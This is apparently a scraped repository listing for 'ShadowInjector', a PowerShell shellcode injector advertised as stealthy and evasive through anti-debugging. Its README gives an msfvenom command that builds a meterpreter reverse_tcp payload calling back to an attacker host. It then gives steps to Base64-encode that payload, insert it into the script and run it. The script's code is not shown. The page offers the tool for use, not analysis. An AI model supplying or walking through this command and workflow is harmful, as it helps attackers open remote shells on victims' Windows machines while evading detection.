Loading repository data…
Loading repository data…
okankurtuluss / repository
A sophisticated PowerShell script that stealthily injects Base64-encoded shellcode into the target process, featuring anti-debugging techniques to evade detection.
A transparent discovery signal based on current public GitHub metadata.
This score does not audit code, security, maintainers, documentation quality, or suitability. Verify the repository and its current documentation before adoption.
A sophisticated PowerShell script that stealthily injects Base64-encoded shellcode into the target process, featuring anti-debugging techniques to evade detection.
You can create the malicious payload as follows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f csharp

Perform the encode process by pasting the created shellcode into the "# shellcode will be written here" section.

Add the base64 encoded payload to the "add_shell_code_here" section of the script.
To run the script, open a PowerShell window and execute the following command:
.\ShadowInjector.ps1


